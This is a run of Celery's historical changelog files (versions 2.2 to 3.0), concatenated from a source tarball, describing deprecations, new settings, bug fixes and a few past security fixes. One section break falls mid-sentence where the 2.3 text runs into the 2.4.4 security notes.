will log the following information:: [INFO/MainProcess] Received task: tasks.add[d7261c71-4962-47e5-b342-2448bedd20e8] [WARNING/PoolWorker-1] Remote Debugger:6900: Please telnet 127.0.0.1 6900. Type `exit` in session to continue. [2011-01-18 14:25:44,119: WARNING/PoolWorker-1] Remote Debugger:6900: Waiting for client... If you telnet the port specified you'll be presented with a ``pdb`` shell: .. code-block:: console $ telnet localhost 6900 Connected to localhost. Escape character is '^]'. > /opt/devel/demoapp/tasks.py(128)add() -> return result (Pdb) Enter ``help`` to get a list of available commands, It may be a good idea to read the `Python Debugger Manual`_ if you have never used `pdb` before. .. _`Python Debugger Manual`: http://docs.python.org/library/pdb.html * Events are now transient and is using a topic exchange (instead of direct). The `CELERYD_EVENT_EXCHANGE`, `CELERYD_EVENT_ROUTING_KEY`, `CELERYD_EVENT_EXCHANGE_TYPE` settings are no longer in use. This means events won't be stored until there's a consumer, and the events will be gone as soon as the consumer stops. Also it means there can be multiple monitors running at the same time. The routing key of an event is the type of event (e.g., `worker.started`, `worker.heartbeat`, `task.succeeded`, etc. This means a consumer can filter on specific types, to only be alerted of the events it cares about. Each consumer will create a unique queue, meaning it's in effect a broadcast exchange. This opens up a lot of possibilities, for example the workers could listen for worker events to know what workers are in the neighborhood, and even restart workers when they go down (or use this information to optimize tasks/autoscaling). .. note:: The event exchange has been renamed from ``"celeryevent"`` to ``"celeryev"`` so it doesn't collide with older versions. If you'd like to remove the old exchange you can do so by executing the following command: .. code-block:: console $ camqadm exchange.delete celeryevent * The worker now starts without configuration, and configuration can be specified directly on the command-line. Configuration options must appear after the last argument, separated by two dashes: .. code-block:: console $ celery worker -l info -I tasks -- broker.host=localhost broker.vhost=/app * Configuration is now an alias to the original configuration, so changes to the original will reflect Celery at runtime. * `celery.conf` has been deprecated, and modifying `celery.conf.ALWAYS_EAGER` will no longer have any effect. The default configuration is now available in the :mod:`celery.app.defaults` module. The available configuration options and their types can now be introspected. * Remote control commands are now provided by `kombu.pidbox`, the generic process mailbox. * Internal module `celery.worker.listener` has been renamed to `celery.worker.consumer`, and `.CarrotListener` is now `.Consumer`. * Previously deprecated modules `celery.models` and `celery.management.commands` have now been removed as per the deprecation time-line. * [Security: Low severity] Removed `celery.task.RemoteExecuteTask` and accompanying functions: `dmap`, `dmap_async`, and `execute_remote`. Executing arbitrary code using pickle is a potential security issue if someone gains unrestricted access to the message broker. If you really need this functionality, then you'd've to add this to your own project. * [Security: Low severity] The `stats` command no longer transmits the broker password. One would've needed an authenticated broker connection to receive this password in the first place, but sniffing the password at the wire level would've been possible if using unencrypted communication. .. _v220-news: News ---- * The internal module `celery.task.builtins` has been removed. * The module `celery.task.schedules` is deprecated, and `celery.schedules` should be used instead. For example if you have:: from celery.task.schedules import crontab You should replace that with:: from celery.schedules import crontab The module needs to be renamed because it must be possible to import schedules without importing the `celery.task` module. * The following functions have been deprecated and is scheduled for removal in version 2.3: * `celery.execute.apply_async` Use `task.apply_async()` instead. * `celery.execute.apply` Use `task.apply()` instead. * `celery.execute.delay_task` Use `registry.tasks[name].delay()` instead. * Importing `TaskSet` from `celery.task.base` is now deprecated. You should use:: >>> from celery.task import TaskSet instead. * New remote control commands: * `active_queues` Returns the queue declarations a worker is currently consuming from. * Added the ability to retry publishing the task message in the event of connection loss or failure. This is disabled by default but can be enabled using the :setting:`CELERY_TASK_PUBLISH_RETRY` setting, and tweaked by the :setting:`CELERY_TASK_PUBLISH_RETRY_POLICY` setting. In addition `retry`, and `retry_policy` keyword arguments have been added to `Task.apply_async`. .. note:: Using the `retry` argument to `apply_async` requires you to handle the publisher/connection manually. * Periodic Task classes (`@periodic_task`/`PeriodicTask`) will *not* be deprecated as previously indicated in the source code. But you're encouraged to use the more flexible :setting:`CELERYBEAT_SCHEDULE` setting. * Built-in daemonization support of the worker using `celery multi` is no longer experimental and is considered production quality. See :ref:`daemon-generic` if you want to use the new generic init scripts. * Added support for message compression using the :setting:`CELERY_MESSAGE_COMPRESSION` setting, or the `compression` argument to `apply_async`. This can also be set using routers. * worker: Now logs stack-trace of all threads when receiving the `SIGUSR1` signal (doesn't work on CPython 2.4, Windows or Jython). Inspired by https://gist.github.com/737056 * Can now remotely terminate/kill the worker process currently processing a task. The `revoke` remote control command now supports a `terminate` argument Default signal is `TERM`, but can be specified using the `signal` argument. Signal can be the uppercase name of any signal defined in the :mod:`signal` module in the Python Standard Library. Terminating a task also revokes it. Example:: >>> from celery.task.control import revoke >>> revoke(task_id, terminate=True) >>> revoke(task_id, terminate=True, signal='KILL') >>> revoke(task_id, terminate=True, signal='SIGKILL') * `TaskSetResult.join_native`: Backend-optimized version of `join()`. If available, this version uses the backends ability to retrieve multiple results at once, unlike `join()` which fetches the results one by one. So far only supported by the AMQP result backend. Support for Memcached and Redis may be added later. * Improved implementations of `TaskSetResult.join` and `AsyncResult.wait`. An `interval` keyword argument have been added to both so the polling interval can be specified (default interval is 0.5 seconds). A `propagate` keyword argument have been added to `result.wait()`, errors will be returned instead of raised if this is set to False. .. warning:: You should decrease the polling interval when using the database result backend, as frequent polling can result in high database load. * The PID of the child worker process accepting a task is now sent as a field with the :event:`task-started` event. * The following fields have been added to all events in the worker class: * `sw_ident`: Name of worker software (e.g., ``"py-celery"``). * `sw_ver`: Software version (e.g., 2.2.0). * `sw_sys`: Operating System (e.g., Linux, Windows, Darwin). * For better accuracy the start time reported by the multiprocessing worker process is used when calculating task duration. Previously the time reported by the accept callback was used. * `celerybeat`: New built-in daemonization support using the `--detach` option. * `celeryev`: New built-in daemonization support using the `--detach` option. * `TaskSet.apply_async`: Now supports custom publishers by using the `publisher` argument. * Added :setting:`CELERY_SEND_TASK_SENT_EVENT` setting. If enabled an event will be sent with every task, so monitors can track tasks before the workers receive them. * `celerybeat`: Now reuses the broker connection when calling scheduled tasks. * The configuration module and loader to use can now be specified on the command-line. For example: .. code-block:: console $ celery worker --config=celeryconfig.py --loader=myloader.Loader * Added signals: `beat_init` and `beat_embedded_init` * :signal:`celery.signals.beat_init` Dispatched when :program:`celerybeat` starts (either standalone or embedded). Sender is the :class:`celery.beat.Service` instance. * :signal:`celery.signals.beat_embedded_init` Dispatched in addition to the :signal:`beat_init` signal when :program:`celerybeat` is started as an embedded process. Sender is the :class:`celery.beat.Service` instance. * Redis result backend: Removed deprecated settings `REDIS_TIMEOUT` and `REDIS_CONNECT_RETRY`. * CentOS init-script for :program:`celery worker` now available in `extra/centos`. * Now depends on :pypi:`pyparsing` version 1.5.0 or higher. There have been reported issues using Celery with :pypi:`pyparsing` 1.4.x, so please upgrade to the latest version. * Lots of new unit tests written, now with a total coverage of 95%. .. _v220-fixes: Fixes ----- * `celeryev` Curses Monitor: Improved resize handling and UI layout (Issue #274 + Issue #276) * AMQP Backend: Exceptions occurring while sending task results are now propagated instead of silenced. the worker will then show the full traceback of these errors in the log. * AMQP Backend: No longer deletes the result queue after successful poll, as this should be handled by the :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` setting instead. * AMQP Backend: Now ensures queues are declared before polling results. * Windows: worker: Show error if running with `-B` option. Running ``celerybeat`` embedded is known not to work on Windows, so users are encouraged to run ``celerybeat`` as a separate service instead. * Windows: Utilities no longer output ANSI color codes on Windows * ``camqadm``: Now properly handles :kbd:`Control-c` by simply exiting instead of showing confusing traceback. * Windows: All tests are now passing on Windows. * Remove bin/ directory, and `scripts` section from :file:`setup.py`. This means we now rely completely on setuptools entry-points. .. _v220-experimental: Experimental ------------ * Jython: worker now runs on Jython using the threaded pool. All tests pass, but there may still be bugs lurking around the corners. * PyPy: worker now runs on PyPy. It runs without any pool, so to get parallel execution you must start multiple instances (e.g., using :program:`multi`). Sadly an initial benchmark seems to show a 30% performance decrease on ``pypy-1.4.1`` + JIT. We would like to find out why this is, so stay tuned. * :class:`PublisherPool`: Experimental pool of task publishers and connections to be used with the `retry` argument to `apply_async`. The example code below will re-use connections and channels, and retry sending of the task message if the connection is lost. .. code-block:: python from celery import current_app # Global pool pool = current_app().amqp.PublisherPool(limit=10) def my_view(request): with pool.acquire() as publisher: add.apply_async((2, 2), publisher=publisher, retry=True) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-2.3.rst0000664000175000017500000002573500000000000020323 0ustar00asifasif00000000000000.. _changelog-2.3: =============================== Change history for Celery 2.3 =============================== .. contents:: :local: .. _version-2.3.4: 2.3.4 ===== :release-date: 2011-11-25 04:00 p.m. GMT :release-by: Ask Solem .. _v234-security-fixes: Security Fixes -------------- * [Security: `CELERYSA-0001`_] Daemons would set effective id's rather than real id's when the :option:`--uid `/ :option:`--gid ` arguments to :program:`celery multi`, :program:`celeryd_detach`, :program:`celery beat` and :program:`celery events` were used. This means privileges weren't properly dropped, and that it would be possible to regain supervisor privileges later. .. _`CELERYSA-0001`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0001.txt Fixes ----- * Backported fix for #455 from 2.4 to 2.3. * StateDB wasn't saved at shutdown. * Fixes worker sometimes hanging when hard time limit exceeded. .. _version-2.3.3: 2.3.3 ===== :release-date: 2011-16-09 05:00 p.m. BST :release-by: Mher Movsisyan * Monkey patching :attr:`sys.stdout` could result in the worker crashing if the replacing object didn't define :meth:`isatty` (Issue #477). * ``CELERYD`` option in :file:`/etc/default/celeryd` shouldn't be used with generic init-scripts. .. _version-2.3.2: 2.3.2 ===== :release-date: 2011-10-07 05:00 p.m. BST :release-by: Ask Solem .. _v232-news: News ---- * Improved Contributing guide. If you'd like to contribute to Celery you should read the :ref:`Contributing Gudie `. We're looking for contributors at all skill levels, so don't hesitate! * Now depends on Kombu 1.3.1 * ``Task.request`` now contains the current worker host name (Issue #460). Available as ``task.request.hostname``. * It's now easier for app subclasses to extend how they're pickled. (see :class:`celery.app.AppPickler`). .. _v232-fixes: Fixes ----- * `purge/discard_all` wasn't working correctly (Issue #455). * The coloring of log messages didn't handle non-ASCII data well (Issue #427). * [Windows] the multiprocessing pool tried to import ``os.kill`` even though this isn't available there (Issue #450). * Fixes case where the worker could become unresponsive because of tasks exceeding the hard time limit. * The :event:`task-sent` event was missing from the event reference. * ``ResultSet.iterate`` now returns results as they finish (Issue #459). This wasn't the case previously, even though the documentation states this was the expected behavior. * Retries will no longer be performed when tasks are called directly (using ``__call__``). Instead the exception passed to ``retry`` will be re-raised. * Eventlet no longer crashes if autoscale is enabled. growing and shrinking eventlet pools is still not supported. * ``py24`` target removed from :file:`tox.ini`. .. _version-2.3.1: 2.3.1 ===== :release-date: 2011-08-07 08:00 p.m. BST :release-by: Ask Solem Fixes ----- * The :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` setting didn't work, resulting in an AMQP related error about not being able to serialize floats while trying to publish task states (Issue #446). .. _version-2.3.0: 2.3.0 ===== :release-date: 2011-08-05 12:00 p.m. BST :tested: CPython: 2.5, 2.6, 2.7; PyPy: 1.5; Jython: 2.5.2 :release-by: Ask Solem .. _v230-important: Important Notes --------------- * Now requires Kombu 1.2.1 * Results are now disabled by default. The AMQP backend wasn't a good default because often the users were not consuming the results, resulting in thousands of queues. While the queues can be configured to expire if left unused, it wasn't possible to enable this by default because this was only available in recent RabbitMQ versions (2.1.1+) With this change enabling a result backend will be a conscious choice, which will hopefully lead the user to read the documentation and be aware of any common pitfalls with the particular backend. The default backend is now a dummy backend (:class:`celery.backends.base.DisabledBackend`). Saving state is simply an no-op, and AsyncResult.wait(), .result, .state, etc. will raise a :exc:`NotImplementedError` telling the user to configure the result backend. For help choosing a backend please see :ref:`task-result-backends`. If you depend on the previous default which was the AMQP backend, then you have to set this explicitly before upgrading:: CELERY_RESULT_BACKEND = 'amqp' .. note:: For :pypi:`django-celery` users the default backend is still ``database``, and results are not disabled by default. * The Debian init-scripts have been deprecated in favor of the generic-init.d init-scripts. In addition generic init-scripts for ``celerybeat`` and ``celeryev`` has been added. .. _v230-news: News ---- * Automatic connection pool support. The pool is used by everything that requires a broker connection, for example calling tasks, sending broadcast commands, retrieving results with the AMQP result backend, and so on. The pool is disabled by default, but you can enable it by configuring the :setting:`BROKER_POOL_LIMIT` setting:: BROKER_POOL_LIMIT = 10 A limit of 10 means a maximum of 10 simultaneous connections can co-exist. Only a single connection will ever be used in a single-thread environment, but in a concurrent environment (threads, greenlets, etc., but not processes) when the limit has been exceeded, any try to acquire a connection will block the thread and wait for a connection to be released. This is something to take into consideration when choosing a limit. A limit of :const:`None` or 0 means no limit, and connections will be established and closed every time. * Introducing Chords (taskset callbacks). A chord is a task that only executes after all of the tasks in a taskset has finished executing. It's a fancy term for "taskset callbacks" adopted from `Cω `_). It works with all result backends, but the best implementation is currently provided by the Redis result backend. Here's an example chord:: >>> chord(add.subtask((i, i)) ... for i in xrange(100))(tsum.subtask()).get() 9900 Please read the :ref:`Chords section in the user guide `, if you want to know more. * Time limits can now be set for individual tasks. To set the soft and hard time limits for a task use the ``time_limit`` and ``soft_time_limit`` attributes: .. code-block:: python import time @task(time_limit=60, soft_time_limit=30) def sleeptask(seconds): time.sleep(seconds) If the attributes are not set, then the workers default time limits will be used. New in this version you can also change the time limits for a task at runtime using the :func:`time_limit` remote control command:: >>> from celery.task import control >>> control.time_limit('tasks.sleeptask', ... soft=60, hard=120, reply=True) [{'worker1.example.com': {'ok': 'time limits set successfully'}}] Only tasks that starts executing after the time limit change will be affected. .. note:: Soft time limits will still not work on Windows or other platforms that don't have the ``SIGUSR1`` signal. * Redis backend configuration directive names changed to include the ``CELERY_`` prefix. ===================================== =================================== **Old setting name** **Replace with** ===================================== =================================== `REDIS_HOST` `CELERY_REDIS_HOST` `REDIS_PORT` `CELERY_REDIS_PORT` `REDIS_DB` `CELERY_REDIS_DB` `REDIS_PASSWORD` `CELERY_REDIS_PASSWORD` ===================================== =================================== The old names are still supported but pending deprecation. * PyPy: The default pool implementation used is now multiprocessing if running on PyPy 1.5. * multi: now supports "pass through" options. Pass through options makes it easier to use Celery without a configuration file, or just add last-minute options on the command line. Example use: .. code-block:: console $ celery multi start 4 -c 2 -- broker.host=amqp.example.com \ broker.vhost=/ \ celery.disable_rate_limits=yes * ``celerybeat``: Now retries establishing the connection (Issue #419). * ``celeryctl``: New ``list bindings`` command. Lists the current or all available bindings, depending on the broker transport used. * Heartbeat is now sent every 30 seconds (previously every 2 minutes). * ``ResultSet.join_native()`` and ``iter_native()`` is now supported by the Redis and Cache result backends. This is an optimized version of ``join()`` using the underlying backends ability to fetch multiple results at once. * Can now use SSL when sending error e-mails by enabling the :setting:`EMAIL_USE_SSL` setting. * ``events.default_dispatcher()``: Context manager to easily obtain an event dispatcher instance using the connection pool. * Import errors in the configuration module won't be silenced anymore. * ResultSet.iterate: Now supports the ``timeout``, ``propagate`` and ``interval`` arguments. * ``with_default_connection`` -> ``with default_connection`` * TaskPool.apply_async: Keyword arguments ``callbacks`` and ``errbacks`` has been renamed to ``callback`` and ``errback`` and take a single scalar value instead of a list. * No longer propagates errors occurring during process cleanup (Issue #365) * Added ``TaskSetResult.delete()``, which will delete a previously saved taskset result. * ``celerybeat`` now syncs every 3 minutes instead of only at shutdown (Issue #382). * Monitors now properly handles unknown events, so user-defined events are displayed. * Terminating a task on Windows now also terminates all of the tasks child processes (Issue #384). * worker: ``-I|--include`` option now always searches the current directory to import the specified modules. * Cassandra backend: Now expires results by using TTLs. * Functional test suite in ``funtests`` is now actually working properly, and passing tests. .. _v230-fixes: Fixes ----- * ``celeryev`` was trying to create the pidfile twice. * celery.contrib.batches: Fixed problem where tasks failed silently (Issue #393). * Fixed an issue where logging objects would give "`/ :option:`--gid ` arguments to :program:`celery multi`, :program:`celeryd_detach`, :program:`celery beat` and :program:`celery events` were used. This means privileges weren't properly dropped, and that it would be possible to regain supervisor privileges later. .. _`CELERYSA-0001`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0001.txt .. _v244-fixes: Fixes ----- * Processes pool: Fixed rare deadlock at shutdown (Issue #523). Fix contributed by Ionel Maries Christian. * Webhook tasks issued the wrong HTTP POST headers (Issue #515). The *Content-Type* header has been changed from ``application/json`` ⇒ ``application/x-www-form-urlencoded``, and adds a proper *Content-Length* header. Fix contributed by Mitar. * Daemonization tutorial: Adds a configuration example using Django and virtualenv together (Issue #505). Contributed by Juan Ignacio Catalano. * generic init-scripts now automatically creates log and pid file directories (Issue #545). Contributed by Chris Streeter. .. _version-2.4.3: 2.4.3 ===== :release-date: 2011-11-22 06:00 p.m. GMT :release-by: Ask Solem * Fixes module import typo in `celeryctl` (Issue #538). Fix contributed by Chris Streeter. .. _version-2.4.2: 2.4.2 ===== :release-date: 2011-11-14 12:00 p.m. GMT :release-by: Ask Solem * Program module no longer uses relative imports so that it's possible to do ``python -m celery.bin.name``. .. _version-2.4.1: 2.4.1 ===== :release-date: 2011-11-07 06:00 p.m. GMT :release-by: Ask Solem * ``celeryctl inspect`` commands was missing output. * processes pool: Decrease polling interval for less idle CPU usage. * processes pool: MaybeEncodingError wasn't wrapped in ExceptionInfo (Issue #524). * worker: would silence errors occurring after task consumer started. * logging: Fixed a bug where unicode in stdout redirected log messages couldn't be written (Issue #522). .. _version-2.4.0: 2.4.0 ===== :release-date: 2011-11-04 04:00 p.m. GMT :release-by: Ask Solem .. _v240-important: Important Notes --------------- * Now supports Python 3. * Fixed deadlock in worker process handling (Issue #496). A deadlock could occur after spawning new child processes because the logging library's mutex wasn't properly reset after fork. The symptoms of this bug affecting would be that the worker simply stops processing tasks, as none of the workers child processes are functioning. There was a greater chance of this bug occurring with ``maxtasksperchild`` or a time-limit enabled. This is a workaround for http://bugs.python.org/issue6721#msg140215. Be aware that while this fixes the logging library lock, there could still be other locks initialized in the parent process, introduced by custom code. Fix contributed by Harm Verhagen. * AMQP Result backend: Now expires results by default. The default expiration value is now taken from the :setting:`CELERY_TASK_RESULT_EXPIRES` setting. The old :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` setting has been deprecated and will be removed in version 4.0. Note that this means that the result backend requires RabbitMQ 2.1.0 or higher, and that you have to disable expiration if you're running with an older version. You can do so by disabling the :setting:`CELERY_TASK_RESULT_EXPIRES` setting:: CELERY_TASK_RESULT_EXPIRES = None * Eventlet: Fixed problem with shutdown (Issue #457). * Broker transports can be now be specified using URLs The broker can now be specified as a URL instead. This URL must have the format: .. code-block:: text transport://user:password@hostname:port/virtual_host for example the default broker is written as: .. code-block:: text amqp://guest:guest@localhost:5672// The scheme is required, so that the host is identified as a URL and not just a host name. User, password, port and virtual_host are optional and defaults to the particular transports default value. .. note:: Note that the path component (virtual_host) always starts with a forward-slash. This is necessary to distinguish between the virtual host ``''`` (empty) and ``'/'``, which are both acceptable virtual host names. A virtual host of ``'/'`` becomes: .. code-block:: text amqp://guest:guest@localhost:5672// and a virtual host of ``''`` (empty) becomes: .. code-block:: text amqp://guest:guest@localhost:5672/ So the leading slash in the path component is **always required**. In addition the :setting:`BROKER_URL` setting has been added as an alias to ``BROKER_HOST``. Any broker setting specified in both the URL and in the configuration will be ignored, if a setting isn't provided in the URL then the value from the configuration will be used as default. Also, programs now support the :option:`--broker ` option to specify a broker URL on the command-line: .. code-block:: console $ celery worker -b redis://localhost $ celery inspect -b amqp://guest:guest@localhost//e The environment variable :envvar:`CELERY_BROKER_URL` can also be used to easily override the default broker used. * The deprecated :func:`celery.loaders.setup_loader` function has been removed. * The :setting:`CELERY_TASK_ERROR_WHITELIST` setting has been replaced by a more flexible approach (Issue #447). The error mail sending logic is now available as ``Task.ErrorMail``, with the implementation (for reference) in :mod:`celery.utils.mail`. The error mail class can be sub-classed to gain complete control of when error messages are sent, thus removing the need for a separate white-list setting. The :setting:`CELERY_TASK_ERROR_WHITELIST` setting has been deprecated, and will be removed completely in version 4.0. * Additional Deprecations The following functions has been deprecated and is scheduled for removal in version 4.0: ===================================== =================================== **Old function** **Alternative** ===================================== =================================== `celery.loaders.current_loader` `celery.current_app.loader` `celery.loaders.load_settings` `celery.current_app.conf` `celery.execute.apply` `Task.apply` `celery.execute.apply_async` `Task.apply_async` `celery.execute.delay_task` `celery.execute.send_task` ===================================== =================================== The following settings has been deprecated and is scheduled for removal in version 4.0: ===================================== =================================== **Old setting** **Alternative** ===================================== =================================== `CELERYD_LOG_LEVEL` ``celery worker --loglevel=`` `CELERYD_LOG_FILE` ``celery worker --logfile=`` `CELERYBEAT_LOG_LEVEL` ``celery beat --loglevel=`` `CELERYBEAT_LOG_FILE` ``celery beat --logfile=`` `CELERYMON_LOG_LEVEL` ``celerymon --loglevel=`` `CELERYMON_LOG_FILE` ``celerymon --logfile=`` ===================================== =================================== .. _v240-news: News ---- * No longer depends on :pypi:`pyparsing`. * Now depends on Kombu 1.4.3. * CELERY_IMPORTS can now be a scalar value (Issue #485). It's too easy to forget to add the comma after the sole element of a tuple, and this is something that often affects newcomers. The docs should probably use a list in examples, as using a tuple for this doesn't even make sense. Nonetheless, there are many tutorials out there using a tuple, and this change should be a help to new users. Suggested by :github_user:`jsaxon-cars`. * Fixed a memory leak when using the thread pool (Issue #486). Contributed by Kornelijus Survila. * The ``statedb`` wasn't saved at exit. This has now been fixed and it should again remember previously revoked tasks when a ``--statedb`` is enabled. * Adds :setting:`EMAIL_USE_TLS` to enable secure SMTP connections (Issue #418). Contributed by Stefan Kjartansson. * Now handles missing fields in task messages as documented in the message format documentation. * Missing required field throws :exc:`~@InvalidTaskError` * Missing args/kwargs is assumed empty. Contributed by Chris Chamberlin. * Fixed race condition in :mod:`celery.events.state` (``celerymon``/``celeryev``) where task info would be removed while iterating over it (Issue #501). * The Cache, Cassandra, MongoDB, Redis and Tyrant backends now respects the :setting:`CELERY_RESULT_SERIALIZER` setting (Issue #435). This means that only the database (Django/SQLAlchemy) backends currently doesn't support using custom serializers. Contributed by Steeve Morin * Logging calls no longer manually formats messages, but delegates that to the logging system, so tools like Sentry can easier work with the messages (Issue #445). Contributed by Chris Adams. * ``multi`` now supports a ``stop_verify`` command to wait for processes to shutdown. * Cache backend didn't work if the cache key was unicode (Issue #504). Fix contributed by Neil Chintomby. * New setting :setting:`CELERY_RESULT_DB_SHORT_LIVED_SESSIONS` added, which if enabled will disable the caching of SQLAlchemy sessions (Issue #449). Contributed by Leo Dirac. * All result backends now implements ``__reduce__`` so that they can be pickled (Issue #441). Fix contributed by Remy Noel * multi didn't work on Windows (Issue #472). * New-style ``CELERY_REDIS_*`` settings now takes precedence over the old ``REDIS_*`` configuration keys (Issue #508). Fix contributed by Joshua Ginsberg * Generic beat init-script no longer sets `bash -e` (Issue #510). Fix contributed by Roger Hu. * Documented that Chords don't work well with :command:`redis-server` versions before 2.2. Contributed by Dan McGee. * The :setting:`CELERYBEAT_MAX_LOOP_INTERVAL` setting wasn't respected. * ``inspect.registered_tasks`` renamed to ``inspect.registered`` for naming consistency. The previous name is still available as an alias. Contributed by Mher Movsisyan * Worker logged the string representation of args and kwargs without safe guards (Issue #480). * RHEL init-script: Changed worker start-up priority. The default start / stop priorities for MySQL on RHEL are: .. code-block:: console # chkconfig: - 64 36 Therefore, if Celery is using a database as a broker / message store, it should be started after the database is up and running, otherwise errors will ensue. This commit changes the priority in the init-script to: .. code-block:: console # chkconfig: - 85 15 which are the default recommended settings for 3-rd party applications and assure that Celery will be started after the database service & shut down before it terminates. Contributed by Yury V. Zaytsev. * KeyValueStoreBackend.get_many didn't respect the ``timeout`` argument (Issue #512). * beat/events's ``--workdir`` option didn't :manpage:`chdir(2)` before after configuration was attempted (Issue #506). * After deprecating 2.4 support we can now name modules correctly, since we can take use of absolute imports. Therefore the following internal modules have been renamed: ``celery.concurrency.evlet`` -> ``celery.concurrency.eventlet`` ``celery.concurrency.evg`` -> ``celery.concurrency.gevent`` * :file:`AUTHORS` file is now sorted alphabetically. Also, as you may have noticed the contributors of new features/fixes are now mentioned in the Changelog. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-2.5.rst0000664000175000017500000001244600000000000020320 0ustar00asifasif00000000000000.. _changelog-2.5: =============================== Change history for Celery 2.5 =============================== This document contains change notes for bugfix releases in the 2.5.x series, please see :ref:`whatsnew-2.5` for an overview of what's new in Celery 2.5. If you're looking for versions prior to 2.5 you should visit our :ref:`history` of releases. .. contents:: :local: .. _version-2.5.5: 2.5.5 ===== :release-date: 2012-06-06 04:00 p.m. BST :release-by: Ask Solem This is a dummy release performed for the following goals: - Protect against force upgrading to Kombu 2.2.0 - Version parity with :pypi:`django-celery` .. _version-2.5.3: 2.5.3 ===== :release-date: 2012-04-16 07:00 p.m. BST :release-by: Ask Solem * A bug causes messages to be sent with UTC time-stamps even though :setting:`CELERY_ENABLE_UTC` wasn't enabled (Issue #636). * ``celerybeat``: No longer crashes if an entry's args is set to None (Issue #657). * Auto-reload didn't work if a module's ``__file__`` attribute was set to the modules ``.pyc`` file. (Issue #647). * Fixes early 2.5 compatibility where ``__package__`` doesn't exist (Issue #638). .. _version-2.5.2: 2.5.2 ===== :release-date: 2012-04-13 04:30 p.m. GMT :release-by: Ask Solem .. _v252-news: News ---- - Now depends on Kombu 2.1.5. - Django documentation has been moved to the main Celery docs. See :ref:`django`. - New :signal:`celeryd_init` signal can be used to configure workers by hostname. - Signal.connect can now be used as a decorator. Example: .. code-block:: python from celery.signals import task_sent @task_sent.connect def on_task_sent(**kwargs): print('sent task: %r' % (kwargs,)) - Invalid task messages are now rejected instead of acked. This means that they will be moved to the dead-letter queue introduced in the latest RabbitMQ version (but must be enabled manually, consult the RabbitMQ documentation). - Internal logging calls has been cleaned up to work better with tools like Sentry. Contributed by David Cramer. - New method ``subtask.clone()`` can be used to clone an existing subtask with augmented arguments/options. Example: .. code-block:: pycon >>> s = add.subtask((5,)) >>> new = s.clone(args=(10,), countdown=5}) >>> new.args (10, 5) >>> new.options {'countdown': 5} - Chord callbacks are now triggered in eager mode. .. _v252-fixes: Fixes ----- - Programs now verifies that the pidfile is actually written correctly (Issue #641). Hopefully this will crash the worker immediately if the system is out of space to store the complete pidfile. In addition, we now verify that existing pidfiles contain a new line so that a partially written pidfile is detected as broken, as before doing: .. code-block:: console $ echo -n "1" > celeryd.pid would cause the worker to think that an existing instance was already running (init has pid 1 after all). - Fixed 2.5 compatibility issue with use of print_exception. Fix contributed by Martin Melin. - Fixed 2.5 compatibility issue with imports. Fix contributed by Iurii Kriachko. - All programs now fix up ``__package__`` when called as main. This fixes compatibility with Python 2.5. Fix contributed by Martin Melin. - [celery control|inspect] can now be configured on the command-line. Like with the worker it is now possible to configure Celery settings on the command-line for celery control|inspect .. code-block:: console $ celery inspect -- broker.pool_limit=30 - Version dependency for :pypi:`python-dateutil` fixed to be strict. Fix contributed by Thomas Meson. - ``Task.__call__`` is now optimized away in the task tracer rather than when the task class is created. This fixes a bug where a custom __call__ may mysteriously disappear. - Auto-reload's ``inotify`` support has been improved. Contributed by Mher Movsisyan. - The Django broker documentation has been improved. - Removed confusing warning at top of routing user guide. .. _version-2.5.1: 2.5.1 ===== :release-date: 2012-03-01 01:00 p.m. GMT :release-by: Ask Solem .. _v251-fixes: Fixes ----- * Eventlet/Gevent: A small typo caused the worker to hang when eventlet/gevent was used, this was because the environment wasn't monkey patched early enough. * Eventlet/Gevent: Another small typo caused the mediator to be started with eventlet/gevent, which would make the worker sometimes hang at shutdown. * :mod:`multiprocessing`: Fixed an error occurring if the pool was stopped before it was properly started. * Proxy objects now redirects ``__doc__`` and ``__name__`` so ``help(obj)`` works. * Internal timer (timer2) now logs exceptions instead of swallowing them (Issue #626). * celery shell: can now be started with :option:`--eventlet ` or :option:`--gevent ` options to apply their monkey patches. .. _version-2.5.0: 2.5.0 ===== :release-date: 2012-02-24 04:00 p.m. GMT :release-by: Ask Solem See :ref:`whatsnew-2.5`. Since the changelog has gained considerable size, we decided to do things differently this time: by having separate "what's new" documents for major version changes. Bugfix releases will still be found in the changelog. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-3.0.rst0000664000175000017500000014030500000000000020310 0ustar00asifasif00000000000000.. _changelog-3.0: =============================== Change history for Celery 3.0 =============================== .. contents:: :local: If you're looking for versions prior to 3.0.x you should go to :ref:`history`. .. _version-3.0.24: 3.0.24 ====== :release-date: 2013-10-11 04:40 p.m. BST :release-by: Ask Solem - Now depends on :ref:`Kombu 2.5.15 `. - Now depends on :pypi:`billiard` version 2.7.3.34. - AMQP Result backend: No longer caches queue declarations. The queues created by the AMQP result backend are always unique, so caching the declarations caused a slow memory leak. - Worker: Fixed crash when hostname contained Unicode characters. Contributed by Daodao. - The worker would no longer start if the `-P solo` pool was selected (Issue #1548). - Redis/Cache result backends wouldn't complete chords if any of the tasks were retried (Issue #1401). - Task decorator is no longer lazy if app is finalized. - AsyncResult: Fixed bug with ``copy(AsyncResult)`` when no ``current_app`` available. - ResultSet: Now properly propagates app when passed string id's. - Loader now ignores :envvar:`CELERY_CONFIG_MODULE` if value is empty string. - Fixed race condition in Proxy object where it tried to delete an attribute twice, resulting in :exc:`AttributeError`. - Task methods now works with the :setting:`CELERY_ALWAYS_EAGER` setting (Issue #1478). - :class:`~kombu.common.Broadcast` queues were accidentally declared when publishing tasks (Issue #1540). - New :envvar:`C_FAKEFORK` environment variable can be used to debug the init-scripts. Setting this will skip the daemonization step so that errors printed to stderr after standard outs are closed can be seen: .. code-block:: console $ C_FAKEFORK /etc/init.d/celeryd start This works with the `celery multi` command in general. - ``get_pickleable_etype`` didn't always return a value (Issue #1556). - Fixed bug where ``app.GroupResult.restore`` would fall back to the default app. - Fixed rare bug where built-in tasks would use the current_app. - :func:`~celery.platforms.maybe_fileno` now handles :exc:`ValueError`. .. _version-3.0.23: 3.0.23 ====== :release-date: 